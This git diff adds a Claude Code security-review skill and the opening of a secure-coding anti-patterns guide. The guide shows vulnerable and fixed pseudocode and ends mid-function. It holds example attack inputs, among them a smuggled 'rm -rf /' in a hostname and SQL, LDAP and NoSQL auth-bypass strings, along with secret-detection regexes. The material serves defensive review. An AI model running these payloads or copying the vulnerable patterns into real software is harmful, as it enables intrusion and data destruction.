diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..9f8ad30 Binary files /dev/null and b/.DS_Store differ diff --git a/.claude/.DS_Store b/.claude/.DS_Store new file mode 100644 index 0000000..31980e2 Binary files /dev/null and b/.claude/.DS_Store differ diff --git a/.claude/skills/security-review-swarm/SKILL.md b/.claude/skills/security-review-swarm/SKILL.md new file mode 100644 index 0000000..9b6c148 --- /dev/null +++ b/.claude/skills/security-review-swarm/SKILL.md @@ -0,0 +1,396 @@ +--- +name: security-review-swarm +description: Comprehensive security code review using parallel agent swarms. Use this skill when performing security audits, vulnerability assessments, or pre-deployment security reviews on codebases. Triggers include: "security review", "security audit", "vulnerability scan", "find vulnerabilities", "check for security issues", "pentest the code", "audit authentication", "review for injection", "check for XSS", "credential scan", or any request involving security analysis of code. Supports both quick breadth scans and deep audits using specialized parallel agents for secrets, injection, XSS, authentication, cryptography, input validation, and dependency analysis. +--- + +# Security Review Swarm + +Orchestrates parallel security review agents using Claude Code's TeammateTool and Task system for comprehensive vulnerability detection. 
+ +## Usage Patterns + +``` +/security-review # Quick breadth review of staged/recent changes +/security-review src/ # Review specific directory (breadth) +/security-review --deep # Deep audit with parallel specialists +/security-review --deep src/auth/ # Deep audit of specific path +/security-review --full # Complete swarm: all specialists in parallel +``` + +## Review Modes + +| Mode | Agents | Patterns | Use Case | +|------|--------|----------|----------| +| **Quick** (default) | 1 | 25+ breadth | PRs, quick scans, daily reviews | +| **Deep** (`--deep`) | 1 | 7 critical depth | Auth, crypto, payments, pre-launch | +| **Full** (`--full`) | 7 parallel | All patterns | Complete security audit | + +## Orchestration Instructions + +### Mode 1: Quick Review (Default) + +Single-agent review using BREADTH patterns: + +1. Load `references/ANTI_PATTERNS_BREADTH.md` +2. Determine scope (file path, `git diff HEAD~1`, or `git diff --cached`) +3. Analyze against all 25+ patterns, prioritizing: + - §1: Secrets and Credentials + - §2: Injection (SQL, Command, NoSQL) + - §3: XSS (Reflected, Stored, DOM) + - §4: Authentication & Sessions +4. Report findings in standard format + +### Mode 2: Deep Review (`--deep`) + +Single-agent deep dive using DEPTH patterns: + +1. Load `references/ANTI_PATTERNS_DEPTH.md` +2. For each of the 7 critical patterns, check: + - Multiple manifestation examples + - Edge cases section + - Common mistakes section + - Detection hints +3. Include security checklists in report + +### Mode 3: Full Swarm Review (`--full`) + +Parallel specialist agents for comprehensive coverage: + +```pseudocode +// 1. Create review team +Teammate({ operation: "spawnTeam", team_name: "security-review-{timestamp}" }) + +// 2. Create task queue for findings aggregation +TaskCreate({ subject: "Aggregate Findings", description: "Collect all specialist reports" }) + +// 3. 
Spawn 7 parallel specialists +specialists = [ + {name: "secrets-scanner", focus: "Pattern 1: Hardcoded Secrets"}, + {name: "injection-hunter", focus: "Pattern 2: SQL/Command Injection"}, + {name: "xss-detector", focus: "Pattern 3: Cross-Site Scripting"}, + {name: "auth-auditor", focus: "Pattern 4: Authentication & Sessions"}, + {name: "crypto-reviewer", focus: "Pattern 5: Cryptographic Failures"}, + {name: "input-validator", focus: "Pattern 6: Input Validation"}, + {name: "dependency-checker", focus: "Pattern 7: Dependencies & Supply Chain"} +] + +FOR specialist IN specialists: + Task({ + team_name: team_name, + name: specialist.name, + subagent_type: "general-purpose", + prompt: buildSpecialistPrompt(specialist, targetPath, context), + run_in_background: true + }) + +// 4. Wait for all specialists to report +// 5. Synthesize findings into unified report +// 6. Cleanup team +``` + +## Specialist Prompts + +### Secrets Scanner Agent + +``` +You are a security specialist focused on credential and secrets exposure. + +SCOPE: {target_path} + +Review for Pattern 1 (Hardcoded Secrets) from the security anti-patterns guide: + +CHECK FOR: +1. API keys, tokens, passwords in source code +2. Database connection strings with embedded credentials +3. JWT secrets and signing keys +4. Private keys (RSA, EC, SSH) +5. OAuth client secrets (especially in frontend code) +6. AWS/GCP/Azure credentials +7. Secrets in CI/CD configs, Docker files, environment files +8. Credentials leaked in logs or error messages +9. Test credentials that could work in production +10. 
Secrets in URL query parameters + +DETECTION PATTERNS: +- Variables named: password, secret, key, token, credential, api_key +- Patterns: sk_live_, sk_test_, ghp_, gho_, AKIA, AIza +- Private key markers: -----BEGIN ((RSA|EC|DSA|OPENSSH) )?PRIVATE KEY----- +- Connection strings: (mysql|postgresql|mongodb|redis)://[^:]+:[^@]+@ + +Send findings to team-lead with: +- File path and line number +- CWE reference (CWE-798, CWE-259, CWE-321) +- Severity (Critical/High) +- Specific remediation +``` + +### Injection Hunter Agent + +``` +You are a security specialist focused on injection vulnerabilities. + +SCOPE: {target_path} + +Review for Pattern 2 (Injection) from the security anti-patterns guide: + +CHECK FOR: +1. SQL queries with string concatenation or interpolation +2. Dynamic table/column names without allowlist +3. ORDER BY, LIMIT clauses with user input +4. Shell commands constructed with user data +5. LDAP filter construction +6. XPath query building +7. NoSQL query injection ($ne, $gt operators from user input) +8. Template injection (SSTI) +9. Second-order injection (stored data used unsafely later) +10. ORM raw queries without parameterization + +DETECTION PATTERNS: +- String concat in queries: (SELECT|INSERT|UPDATE|DELETE).*(\+|concat|\${|f['"]) +- Shell with variables: (system|exec|subprocess).*(\+|\${) +- shell=True usage + +Send findings to team-lead with CWE-89, CWE-78, CWE-90, CWE-643 references. +``` + +### XSS Detector Agent + +``` +You are a security specialist focused on Cross-Site Scripting. + +SCOPE: {target_path} + +Review for Pattern 3 (XSS) from the security anti-patterns guide: + +CHECK FOR: +1. innerHTML, document.write with user data +2. React dangerouslySetInnerHTML without sanitization +3. Vue v-html directive with user input +4. Angular bypassSecurityTrust* usage +5. Template |safe, {{{ }}} (triple braces), <%- %> patterns +6. User input in HTML attributes (especially event handlers) +7. JavaScript context injection +8. 
URL context (javascript:, data: schemes) +9. CSS context injection +10. Missing Content-Security-Policy headers + +CONTEXT-SPECIFIC ENCODING CHECK: +- HTML body: < > & " ' +- Attributes: Above + ` = +- JavaScript: \\' \\" \\n \\x3c \\x3e +- URL: encodeURIComponent + +Send findings to team-lead with CWE-79, CWE-80, CWE-83 references. +``` + +### Auth Auditor Agent + +``` +You are a security specialist focused on authentication and session security. + +SCOPE: {target_path} + +Review for Pattern 4 (Authentication) from the security anti-patterns guide: + +CHECK FOR: +1. Weak password validation (length only, no breach check) +2. Predictable session tokens (sequential, timestamp-based) +3. Session not regenerated after login (fixation) +4. JWT "none" algorithm acceptance +5. Weak JWT secrets (< 256 bits) +6. Tokens in localStorage (XSS exposure) +7. Missing token expiration +8. No rate limiting on auth endpoints +9. Insecure password reset flows +10. Missing MFA for sensitive operations + +SESSION SECURITY: +- HttpOnly, Secure, SameSite cookie flags +- Session invalidation on logout +- Concurrent session handling + +Send findings to team-lead with CWE-287, CWE-384, CWE-613, CWE-307 references. +``` + +### Crypto Reviewer Agent + +``` +You are a security specialist focused on cryptographic implementations. + +SCOPE: {target_path} + +Review for Pattern 5 (Cryptographic Failures) from the security anti-patterns guide: + +CHECK FOR: +1. Deprecated algorithms (MD5, SHA1 for security, DES, RC4) +2. Hardcoded encryption keys +3. ECB mode usage (reveals patterns) +4. Missing or predictable IVs/nonces +5. Custom/"homegrown" crypto implementations +6. Math.random() for security tokens +7. Weak key derivation (direct hash vs PBKDF2/Argon2) +8. Insufficient key lengths (< 256 bits for symmetric) +9. Password storage without bcrypt/argon2 +10. 
Missing authenticated encryption (use GCM, not CBC alone) + +SECURE ALTERNATIVES: +- Passwords: bcrypt, Argon2id, scrypt +- Symmetric: AES-256-GCM, ChaCha20-Poly1305 +- Hashing: SHA-256, SHA-3, BLAKE2 +- Random: secrets module, crypto.randomBytes + +Send findings to team-lead with CWE-327, CWE-328, CWE-330, CWE-326 references. +``` + +### Input Validator Agent + +``` +You are a security specialist focused on input validation. + +SCOPE: {target_path} + +Review for Pattern 6 (Input Validation) from the security anti-patterns guide: + +CHECK FOR: +1. Client-side only validation +2. Missing type checking (especially for NoSQL) +3. No length limits (DoS via large inputs) +4. ReDoS patterns: (a+)+, (a*)* +5. Trusting external data without verification +6. Missing canonicalization before validation +7. Path traversal (../ in file paths) +8. Missing URL scheme validation +9. Accepting untrusted serialized data (pickle, eval) +10. XML without entity restrictions (XXE) + +VALIDATION ORDER: +1. Decode all encoding layers +2. Canonicalize (normalize unicode, resolve paths) +3. Validate against allowlist +4. Encode for output context + +Send findings to team-lead with CWE-20, CWE-22, CWE-1333 references. +``` + +### Dependency Checker Agent + +``` +You are a security specialist focused on supply chain and dependency security. + +SCOPE: {target_path} + +Review for Pattern 7 (Dependencies) from the security anti-patterns guide: + +CHECK FOR: +1. Hallucinated/non-existent packages +2. Typosquatting package names +3. Outdated dependencies with known CVEs +4. Unpinned dependency versions +5. Dependencies from untrusted sources +6. Excessive dependency permissions +7. Dev dependencies in production +8. Deprecated packages +9. Low-maintenance packages (last update > 2 years) +10. 
Suspicious post-install scripts + +VERIFY PACKAGES EXIST: +- npm: https://registry.npmjs.org/{package} +- PyPI: https://pypi.org/pypi/{package}/json +- Check download counts and maintenance status + +Send findings to team-lead with CWE-1357 (Reliance on Insufficiently Trustworthy Component; covers slopsquatting) references. +``` + +## Report Format + +```markdown +## Security Review Results + +**Scope:** {files/directories reviewed} +**Mode:** {quick|deep|full} +**Agents:** {list of specialists if full mode} +**Duration:** {time taken} + +### Summary + +| Severity | Count | Categories | +|----------|-------|------------| +| Critical | X | Secrets, Injection | +| High | X | Auth, XSS | +| Medium | X | Config, Input | + +### Critical Issues +{Must fix before deployment} + +### High Priority +{Fix soon} + +### Medium Priority +{Address when convenient} + +### Findings by Category + +#### 1. Secrets & Credentials +[Findings from secrets-scanner] + +#### 2. Injection Vulnerabilities +[Findings from injection-hunter] + +... {continue for each category} + +### Good Practices Found +{Positive patterns already in place} + +--- + +### Detailed Findings + +#### {Issue Title} +- **File:** `path/to/file.ts:123` +- **CWE:** CWE-XXX (Name) +- **Severity:** Critical/High/Medium +- **Agent:** {specialist name} +- **Pattern:** Brief description +- **Code:** + ``` + {vulnerable code snippet} + ``` +- **Fix:** + ``` + {remediated code} + ``` +- **Reference:** ANTI_PATTERNS_{BREADTH|DEPTH}.md §{section} +``` + +## Auto-Escalation Rules + +Automatically use DEPTH patterns (even without `--deep`) when reviewing: + +- `**/auth/**`, `**/login/**`, `**/session/**` +- `**/payment/**`, `**/stripe/**`, `**/billing/**` +- `**/crypto/**`, `**/encrypt/**`, `**/token/**` +- Files containing: `password`, `secret`, `jwt`, `bcrypt`, `oauth` + +Automatically use FULL swarm (even without `--full`) when: + +- Reviewing > 50 files +- Pre-production/release audit requested +- Scope includes authentication + payments + API +- User mentions "comprehensive" or 
"complete" audit + +## Team Lifecycle + +```pseudocode +// Full swarm cleanup sequence +FOR specialist IN active_specialists: + Teammate({ operation: "requestShutdown", target_agent_id: specialist.name }) + // Wait for shutdown_approved message + +// Verify all shutdown before cleanup +Teammate({ operation: "cleanup" }) +``` + +## References + +- `references/ANTI_PATTERNS_BREADTH.md` - 25+ patterns, ~65K tokens +- `references/ANTI_PATTERNS_DEPTH.md` - 7 critical patterns with edge cases, ~100K tokens diff --git a/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_BREADTH.md b/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_BREADTH.md new file mode 100644 index 0000000..215304f --- /dev/null +++ b/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_BREADTH.md @@ -0,0 +1,7315 @@ +--- +type: reference +title: AI Code Security Anti-Patterns - Breadth Version +created: 2026-01-18 +version: 1.0.0 +tags: + - security + - anti-patterns + - ai-generated-code + - llm + - secure-coding +related: + - "[[ANTI_PATTERNS_DEPTH]]" + - "[[Ranking-Matrix]]" + - "[[Pseudocode-Examples]]" +--- + +# AI Code Security Anti-Patterns +## Breadth Version - Comprehensive Coverage + +> **Purpose:** Security anti-patterns guide for AI-assisted code generation +> **Audience:** Any LLM system prompt, RAG system, or context file +> **Format:** Pseudocode examples (implement in your target language) +> **How to use:** Include in system prompt or reference during code generation + +--- + +## INSTRUCTIONS FOR AI/LLM + +This document contains security anti-patterns you MUST avoid when generating code. +Each section shows a VULNERABLE pattern (marked BAD) and a SECURE alternative (marked GOOD). +All examples are in PSEUDOCODE - implement the secure patterns in whatever language +the developer is using. When in doubt, choose the more secure option. 
+ +**Key Statistics:** +- AI-generated code has an **86% XSS failure rate** (vs 31.6% human code) +- **5-21% of AI-suggested packages don't exist** (slopsquatting risk) +- AI code is **2.74x more likely** to have XSS vulnerabilities +- **21.7% hallucination rate** for package names in some domains +- SQL injection patterns appeared "thousands of times" in AI training data + +**Before generating any code:** +1. Never hardcode credentials, API keys, or secrets +2. Always parameterize database queries +3. Validate and sanitize all user input +4. Use cryptographically secure random for security tokens +5. Verify packages exist before suggesting imports +6. Encode output for the appropriate context (HTML, URL, JS) + +--- + +## Quick Reference Table + +| Pattern | CWE | Severity | Quick Fix | +|---------|-----|----------|-----------| +| Hallucinated Packages | CWE-1357 | Critical | Verify packages exist before import | +| XSS (Reflected/Stored/DOM) | CWE-79 | Critical | Encode output for context | +| Hardcoded Secrets | CWE-798 | Critical | Use environment variables | +| SQL Injection | CWE-89 | Critical | Use parameterized queries | +| Missing Authentication | CWE-287 | Critical | Apply auth to all protected endpoints | +| Command Injection | CWE-78 | Critical | Use argument arrays, avoid shell | +| Missing Input Validation | CWE-20 | High | Validate type, length, format, range | +| Unrestricted File Upload | CWE-434 | Critical | Validate extension, MIME, and size | +| Insufficient Randomness | CWE-330 | High | Use secrets module for tokens | +| Missing Rate Limiting | CWE-770 | High | Implement per-IP/user limits | +| Excessive Data Exposure | CWE-200 | High | Use DTOs with field allowlists | +| Path Traversal | CWE-22 | High | Validate paths within allowed dirs | +| Weak Password Hashing | CWE-327 | High | Use bcrypt/argon2 with salt | +| Log Injection | CWE-117 | Medium | Sanitize newlines, use structured logging | +| Debug Mode in Production | CWE-215 | High | 
Environment-based configuration | +| Weak Encryption | CWE-326 | High | Use AES-GCM or ChaCha20-Poly1305 | +| Session Fixation | CWE-384 | High | Regenerate session ID on login | +| JWT Misuse | CWE-287 | High | Strong secrets, explicit algorithms | +| Mass Assignment | CWE-915 | High | Allowlist assignable fields | +| Missing Security Headers | CWE-16 | Medium | Add CSP, X-Frame-Options, HSTS | +| Open CORS | CWE-346 | Medium | Restrict to known origins | +| LDAP Injection | CWE-90 | High | Escape special LDAP characters | +| XPath Injection | CWE-643 | High | Use parameterized XPath or validate | +| Insecure Temp Files | CWE-377 | Medium | Use mkstemp with restrictive perms | +| Verbose Error Messages | CWE-209 | Medium | Generic external, detailed internal | + +--- + +## 1. Secrets and Credentials Management + +**CWE References:** CWE-798 (Hard-coded Credentials), CWE-259 (Hard-coded Password) +**Severity:** Critical | **Related:** [[Hardcoded-Secrets]] + +> **Risk:** Secrets committed to version control are scraped within minutes. Leads to cloud resource abuse, data breaches, and significant financial costs. AI frequently generates code with embedded credentials from tutorial examples. 
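One way to keep credentials out of version control, as the risk note above asks, is to read them from the process environment and fail fast when they are missing. The following is a minimal Python sketch of that idea, not part of the committed guide; `require_secret`, `MissingSecretError`, `auth_headers`, and the `API_KEY` variable name are all illustrative assumptions.

```python
import os


class MissingSecretError(RuntimeError):
    """Raised when a required secret is absent from the environment."""


def require_secret(name, env=None):
    """Return the secret stored under `name`, or fail fast if unset or empty.

    `env` defaults to os.environ; passing a plain dict makes the function
    easy to exercise in tests without touching the real environment.
    """
    source = os.environ if env is None else env
    value = source.get(name)
    if not value:
        raise MissingSecretError(name + " environment variable required")
    return value


def auth_headers(env=None):
    # API_KEY is a hypothetical variable name chosen for this sketch.
    return {"Authorization": "Bearer " + require_secret("API_KEY", env)}
```

Failing at startup, rather than falling back to a default value, avoids the situation where a placeholder credential silently ships to production.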
+ +### 1.1 Hardcoded Passwords and API Keys + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Hardcoded API keys and passwords +// ======================================== +CONSTANT API_KEY = "sk-abcd1234efgh5678ijkl9012mnop3456" +CONSTANT DB_PASSWORD = "super_secret_password" +CONSTANT AWS_ACCESS_KEY = "AKIAIOSFODNN7EXAMPLE" +CONSTANT AWS_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" + +FUNCTION call_api(endpoint): + headers = {"Authorization": "Bearer " + API_KEY} + RETURN http.get(endpoint, headers) +END FUNCTION + +// ======================================== +// GOOD: Environment variables +// ======================================== +FUNCTION call_api(endpoint): + api_key = environment.get("API_KEY") + + IF api_key IS NULL: + THROW Error("API_KEY environment variable required") + END IF + + headers = {"Authorization": "Bearer " + api_key} + RETURN http.get(endpoint, headers) +END FUNCTION +``` + +### 1.2 Credentials in Configuration Files + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Credentials in config committed to repo +// ======================================== +// config.json (tracked in git) +{ + "database_url": "postgresql://admin:password123@localhost:5432/mydb", + "redis_password": "redis_secret_123", + "smtp_password": "mail_password" +} + +FUNCTION connect_database(): + config = load_json("config.json") + connection = database.connect(config.database_url) + RETURN connection +END FUNCTION + +// ======================================== +// GOOD: External secret management +// ======================================== +// config.json (no secrets, safe to commit) +{ + "database_host": "localhost", + "database_port": 5432, + "database_name": "mydb" +} + +FUNCTION connect_database(): + config = load_json("config.json") + + // Credentials from environment or secret manager + db_user = environment.get("DB_USER") + 
db_password = environment.get("DB_PASSWORD") + + IF db_user IS NULL OR db_password IS NULL: + THROW Error("Database credentials not configured") + END IF + + url = "postgresql://" + db_user + ":" + db_password + "@" + + config.database_host + ":" + config.database_port + "/" + config.database_name + RETURN database.connect(url) +END FUNCTION +``` + +### 1.3 Secrets in Client-Side Code + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Secrets exposed in frontend JavaScript +// ======================================== +// frontend.js (served to browser) +CONSTANT STRIPE_SECRET_KEY = "sk_live_abc123..." // Never expose secret keys! +CONSTANT ADMIN_PASSWORD = "admin123" + +FUNCTION charge_card(card_number, amount): + RETURN http.post("https://api.stripe.com/charges", { + api_key: STRIPE_SECRET_KEY, // Visible in browser DevTools! + card: card_number, + amount: amount + }) +END FUNCTION + +// ======================================== +// GOOD: Backend proxy for sensitive operations +// ======================================== +// frontend.js +FUNCTION charge_card(card_token, amount): + // Only send public token, backend handles secret key + RETURN http.post("/api/charges", { + token: card_token, + amount: amount + }) +END FUNCTION + +// backend.js (server-side only) +FUNCTION handle_charge(request): + stripe_key = environment.get("STRIPE_SECRET_KEY") + + RETURN stripe.charges.create({ + api_key: stripe_key, + source: request.token, + amount: request.amount + }) +END FUNCTION +``` + +### 1.4 Insecure Credential Storage + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Storing credentials in plaintext +// ======================================== +FUNCTION save_user_credentials(username, password): + // Dangerous: Plaintext password storage + database.insert("credentials", { + username: username, + password: password // Stored as-is! 
+ }) +END FUNCTION + +FUNCTION save_api_key(user_id, api_key): + // Dangerous: No encryption + database.insert("api_keys", { + user_id: user_id, + key: api_key + }) +END FUNCTION + +// ======================================== +// GOOD: Proper credential protection +// ======================================== +FUNCTION save_user_credentials(username, password): + // Hash passwords with bcrypt + salt = bcrypt.generate_salt(rounds=12) + password_hash = bcrypt.hash(password, salt) + + database.insert("credentials", { + username: username, + password_hash: password_hash + }) +END FUNCTION + +FUNCTION save_api_key(user_id, api_key): + // Encrypt sensitive data at rest + encryption_key = secret_manager.get("DATA_ENCRYPTION_KEY") + encrypted_key = aes_gcm_encrypt(api_key, encryption_key) + + database.insert("api_keys", { + user_id: user_id, + encrypted_key: encrypted_key + }) +END FUNCTION +``` + +### 1.5 Missing Secret Rotation Considerations + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Static secrets with no rotation capability +// ======================================== +CONSTANT JWT_SECRET = "static_jwt_secret_forever" + +FUNCTION create_token(user_id): + // No way to rotate without breaking all existing tokens + RETURN jwt.encode({user: user_id}, JWT_SECRET, algorithm="HS256") +END FUNCTION + +// ======================================== +// GOOD: Versioned secrets supporting rotation +// ======================================== +FUNCTION get_jwt_secret(version=NULL): + IF version IS NULL: + version = environment.get("JWT_SECRET_VERSION", "v1") + END IF + + // Fetch versioned secret from manager + RETURN secret_manager.get("JWT_SECRET_" + version) +END FUNCTION + +FUNCTION create_token(user_id): + current_version = environment.get("JWT_SECRET_VERSION") + secret = get_jwt_secret(current_version) + + payload = { + user: user_id, + secret_version: current_version, // Include version for validation + 
exp: current_timestamp() + 3600 + } + RETURN jwt.encode(payload, secret, algorithm="HS256") +END FUNCTION + +FUNCTION verify_token(token): + // Read the version from the unverified payload; use it only to select the key + unverified = jwt.decode(token, verify=FALSE) + version = unverified.get("secret_version", "v1") + + secret = get_jwt_secret(version) + RETURN jwt.decode(token, secret, algorithms=["HS256"]) +END FUNCTION +``` + +--- + +## 2. Injection Vulnerabilities + +**CWE References:** CWE-89 (SQL Injection), CWE-78 (OS Command Injection), CWE-90 (LDAP Injection), CWE-643 (XPath Injection), CWE-943 (NoSQL Injection), CWE-1336 (Template Injection) +**Severity:** Critical | **Related:** [[Injection-Vulnerabilities]] + +> **Risk:** Injection vulnerabilities allow attackers to execute arbitrary code, queries, or commands by manipulating user input. AI models frequently generate vulnerable string concatenation patterns from training data containing millions of insecure examples. Always use parameterized queries and avoid dynamic command construction. 
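To make the difference between concatenation and parameter binding concrete, here is a small runnable Python sketch using the standard-library `sqlite3` module. It is an illustration under assumptions, not part of the committed guide: the in-memory `users` table and the helper names `make_demo_db`, `get_user_unsafe`, and `get_user_safe` are hypothetical.

```python
import sqlite3


def make_demo_db():
    """Create an in-memory database with two demo users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("admin", "admin"), ("alice", "user")],
    )
    return conn


def get_user_unsafe(conn, username):
    # Vulnerable on purpose: the input is spliced into the SQL text,
    # so quotes in `username` can change the structure of the query.
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def get_user_safe(conn, username):
    # The driver binds `username` as a value; it is never parsed as SQL.
    return conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_demo_db()
    payload = "nobody' OR '1'='1"
    print(len(get_user_unsafe(conn, payload)))  # every row matches
    print(len(get_user_safe(conn, payload)))    # no user has that literal name
```

With the payload shown, the concatenated query matches every row because the `OR '1'='1'` clause becomes part of the SQL, while the bound version looks for a user literally named `nobody' OR '1'='1` and finds none.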
+ +### 2.1 SQL Injection (String Concatenation in Queries) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: String concatenation in SQL queries +// ======================================== +FUNCTION get_user(username): + // Vulnerable: User input directly concatenated + query = "SELECT * FROM users WHERE username = '" + username + "'" + RETURN database.execute(query) +END FUNCTION + +FUNCTION search_products(category, min_price): + // Vulnerable: Multiple injection points + query = "SELECT * FROM products WHERE category = '" + category + + "' AND price > " + min_price + RETURN database.execute(query) +END FUNCTION + +// Attack: username = "admin' OR '1'='1' --" +// Result: SELECT * FROM users WHERE username = 'admin' OR '1'='1' --' +// This bypasses authentication and returns all users + +// ======================================== +// GOOD: Parameterized queries (prepared statements) +// ======================================== +FUNCTION get_user(username): + // Safe: Parameters are bound as data and never parsed as SQL + query = "SELECT * FROM users WHERE username = ?" + RETURN database.execute(query, [username]) +END FUNCTION + +FUNCTION search_products(category, min_price): + // Safe: All parameters bound separately + query = "SELECT * FROM products WHERE category = ? AND price > ?" 
+ RETURN database.execute(query, [category, min_price]) +END FUNCTION + +// With named parameters (preferred for clarity) +FUNCTION get_user_named(username): + query = "SELECT * FROM users WHERE username = :username" + RETURN database.execute(query, {username: username}) +END FUNCTION +``` + +### 2.2 Command Injection (Unsanitized Shell Commands) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Shell command with user input +// ======================================== +FUNCTION ping_host(hostname): + // Vulnerable: User controls shell command + command = "ping -c 4 " + hostname + RETURN shell.execute(command) +END FUNCTION + +FUNCTION convert_file(input_path, output_format): + // Vulnerable: Multiple injection points + command = "convert " + input_path + " output." + output_format + RETURN shell.execute(command) +END FUNCTION + +// Attack: hostname = "google.com; rm -rf /" +// Result: ping -c 4 google.com; rm -rf / +// This executes the ping AND deletes the filesystem + +// ======================================== +// GOOD: Use argument arrays, avoid shell +// ======================================== +FUNCTION ping_host(hostname): + // Validate input format first + IF NOT is_valid_hostname(hostname): + THROW Error("Invalid hostname format") + END IF + + // Safe: Arguments passed as array, no shell interpolation + RETURN process.execute(["ping", "-c", "4", hostname], shell=FALSE) +END FUNCTION + +FUNCTION convert_file(input_path, output_format): + // Validate allowed formats + allowed_formats = ["png", "jpg", "gif", "webp"] + IF output_format NOT IN allowed_formats: + THROW Error("Invalid output format") + END IF + + // Validate path is within allowed directory + IF NOT path.is_within(input_path, UPLOAD_DIRECTORY): + THROW Error("Invalid file path") + END IF + + output_path = path.join(OUTPUT_DIR, "output." 
+ output_format) + RETURN process.execute(["convert", input_path, output_path], shell=FALSE) +END FUNCTION + +// Helper: Validate hostname format +FUNCTION is_valid_hostname(hostname): + // Only allow alphanumeric, dots, and hyphens + pattern = "^[a-zA-Z0-9][a-zA-Z0-9.-]{0,253}[a-zA-Z0-9]$" + RETURN regex.match(pattern, hostname) +END FUNCTION +``` + +### 2.3 LDAP Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unescaped LDAP filters +// ======================================== +FUNCTION find_user_by_name(username): + // Vulnerable: User input in LDAP filter + filter = "(uid=" + username + ")" + RETURN ldap.search("ou=users,dc=example,dc=com", filter) +END FUNCTION + +FUNCTION authenticate_ldap(username, password): + // Vulnerable: Both fields injectable + filter = "(&(uid=" + username + ")(userPassword=" + password + "))" + results = ldap.search(BASE_DN, filter) + RETURN results.count > 0 +END FUNCTION + +// Attack: username = "*)(uid=*))(|(uid=*" +// Result: (uid=*)(uid=*))(|(uid=*) +// This can return all users or bypass authentication + +// ======================================== +// GOOD: Escape LDAP special characters +// ======================================== +FUNCTION escape_ldap(input): + // Escape LDAP special characters: * ( ) \ NUL + result = input + result = result.replace("\\", "\\5c") // Backslash first + result = result.replace("*", "\\2a") + result = result.replace("(", "\\28") + result = result.replace(")", "\\29") + result = result.replace("\0", "\\00") + RETURN result +END FUNCTION + +FUNCTION find_user_by_name(username): + // Safe: Input is escaped before use + safe_username = escape_ldap(username) + filter = "(uid=" + safe_username + ")" + RETURN ldap.search("ou=users,dc=example,dc=com", filter) +END FUNCTION + +FUNCTION authenticate_ldap(username, password): + // Better: Use LDAP bind for authentication instead of filter + user_dn = "uid=" + escape_ldap(username) + 
",ou=users,dc=example,dc=com" + + TRY: + connection = ldap.bind(user_dn, password) + connection.close() + RETURN TRUE + CATCH LDAPError: + RETURN FALSE + END TRY +END FUNCTION +``` + +### 2.4 XPath Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unescaped XPath queries +// ======================================== +FUNCTION find_user_xml(username): + // Vulnerable: User input in XPath expression + xpath = "//users/user[name='" + username + "']" + RETURN xml_document.query(xpath) +END FUNCTION + +FUNCTION authenticate_xml(username, password): + // Vulnerable: Both fields injectable + xpath = "//users/user[name='" + username + "' and password='" + password + "']" + result = xml_document.query(xpath) + RETURN result IS NOT EMPTY +END FUNCTION + +// Attack: username = "admin' or '1'='1" +// Result: //users/user[name='admin' or '1'='1'] +// This returns all users, bypassing authentication + +// ======================================== +// GOOD: Parameterized XPath or strict validation +// ======================================== +// Option 1: Use parameterized XPath (if supported) +FUNCTION find_user_xml(username): + xpath = "//users/user[name=$username]" + RETURN xml_document.query(xpath, {username: username}) +END FUNCTION + +// Option 2: Escape XPath special characters +FUNCTION escape_xpath(input): + // Handle quotes by splitting and concatenating + IF input.contains("'") AND input.contains('"'): + // Use concat() for strings with both quote types + parts = input.split("'") + escaped = "concat('" + parts.join("',\"'\",'" ) + "')" + RETURN escaped + ELSE IF input.contains("'"): + RETURN '"' + input + '"' + ELSE: + RETURN "'" + input + "'" + END IF +END FUNCTION + +FUNCTION find_user_xml_escaped(username): + // Validate input format first + IF NOT is_valid_username(username): + THROW Error("Invalid username format") + END IF + + safe_username = escape_xpath(username) + xpath = 
"//users/user[name=" + safe_username + "]" + RETURN xml_document.query(xpath) +END FUNCTION + +// Option 3: Strict whitelist validation +FUNCTION is_valid_username(username): + // Only allow alphanumeric and limited special chars + pattern = "^[a-zA-Z0-9_.-]{1,64}$" + RETURN regex.match(pattern, username) +END FUNCTION +``` + +### 2.5 NoSQL Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unvalidated input in NoSQL queries +// ======================================== +FUNCTION find_user_nosql(query_params): + // Vulnerable: User can inject operators + // If query_params = {"username": {"$ne": ""}} + // This returns all users where username is not empty + RETURN mongodb.collection("users").find(query_params) +END FUNCTION + +FUNCTION authenticate_nosql(username, password): + // Vulnerable: Accepts objects, not just strings + query = { + username: username, // Could be {"$gt": ""} + password: password // Could be {"$gt": ""} + } + user = mongodb.collection("users").find_one(query) + RETURN user IS NOT NULL +END FUNCTION + +// Attack via JSON body: +// {"username": {"$gt": ""}, "password": {"$gt": ""}} +// This bypasses authentication by matching any non-empty values + +// ======================================== +// GOOD: Type validation and operator blocking +// ======================================== +FUNCTION find_user_nosql(username): + // Validate input is a string, not an object + IF typeof(username) != "string": + THROW Error("Username must be a string") + END IF + + // Safe: Only string values can be queried + RETURN mongodb.collection("users").find_one({username: username}) +END FUNCTION + +FUNCTION authenticate_nosql(username, password): + // Strict type checking + IF typeof(username) != "string" OR typeof(password) != "string": + THROW Error("Invalid credential types") + END IF + + // Additional: Block MongoDB operators + IF username.starts_with("$") OR password.starts_with("$"): + 
